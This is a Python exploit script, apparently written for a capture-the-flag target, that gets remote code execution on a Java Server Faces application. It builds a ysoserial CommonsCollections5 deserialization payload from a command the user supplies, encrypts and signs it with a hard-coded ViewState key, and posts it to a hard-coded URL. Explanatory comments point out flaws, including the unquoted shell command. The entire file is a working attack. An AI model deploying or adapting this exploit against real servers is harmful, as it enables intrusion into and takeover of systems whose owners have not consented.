1import sys
2import os
3import base64
4import binascii
5import hmac
6import urllib
7import pyDes
8import requests
9from hashlib import sha1
10
# Gadget-chain names handed to ysoserial; generate() sends one request per entry.
payloads = []
payloads.append('CommonsCollections5')
# Static 8-byte key (base64 of the literal) used both as the DES key and as
# the HMAC key below.  Everything the script builds depends on this value
# being shared with the server and never rotated.
secret_key = base64.b64decode("SnNGOTg3Ni0=")
13
def hmac_signature(secret, string):
    """Return the hex-encoded HMAC-SHA1 of ``string`` keyed with ``secret``.

    Both values go straight to ``hmac.new``; on Python 3 that means they
    must be bytes-like, not ``str``.
    """
    return hmac.new(secret, string, digestmod=sha1).hexdigest()
def encrypter(key, text):
    """DES-ECB encrypt ``text`` under ``key`` with PKCS#5 padding and return the ciphertext.

    Single DES in ECB mode provides neither integrity nor a modern key
    size; the caller layers a separate HMAC over the output.
    """
    cipher = pyDes.des(key, pyDes.ECB)
    return cipher.encrypt(text, padmode=pyDes.PAD_PKCS5)
def generate(cmd):
    """Build one encrypted, HMAC-signed ViewState blob per entry in ``payloads`` and POST it.

    ``cmd`` is interpolated verbatim into a shell command line that runs
    ysoserial.jar.  The gadget output is DES-ECB encrypted, the raw
    HMAC-SHA1 of the ciphertext is appended, and the result is base64-encoded
    and sent as ``javax.faces.ViewState``.  Nothing is returned and the HTTP
    response is discarded, so the caller gets no success/failure signal.
    """
    for payload in payloads:
        # Shell out to ysoserial; no quoting or escaping is applied to cmd.
        command = os.popen('java -jar ysoserial.jar ' + payload + ' "' + cmd + '"')
        result = command.read()
        command.close()
        # NOTE(review): os.popen().read() yields str while the rest of the
        # pipeline concatenates bytes -- this looks Python-2 oriented; confirm.
        # Encrypt-then-MAC, with the single static secret_key used for both.
        DESEncrypted = encrypter(secret_key, result)
        hmac_digest = hmac_signature(secret_key, DESEncrypted)
        # hexdigest -> raw 20-byte tag, appended directly after the ciphertext.
        encoded = DESEncrypted + binascii.unhexlify(hmac_digest)
        b64_encrypted_payload = base64.b64encode(encoded)
        print("\n[*]Sending payload to server...\n")
        # Hard-coded target URL.  The whole scheme rests on secret_key being
        # shared and static: a deployment-specific, rotated ViewState secret
        # invalidates every blob built here.  `r` is never inspected.
        r = requests.post("http://10.10.10.130:8080/userSubscribe.faces", data = {'javax.faces.ViewState':b64_encrypted_payload})
32
# Command-line entry point: exactly one argument (the command string) is expected.
if len(sys.argv) == 2:
    generate(sys.argv[1])
else:
    print("usage = python script.py COMMAND")
    print("e.g., python script.py 'ping -n 8 10.10.14.1'")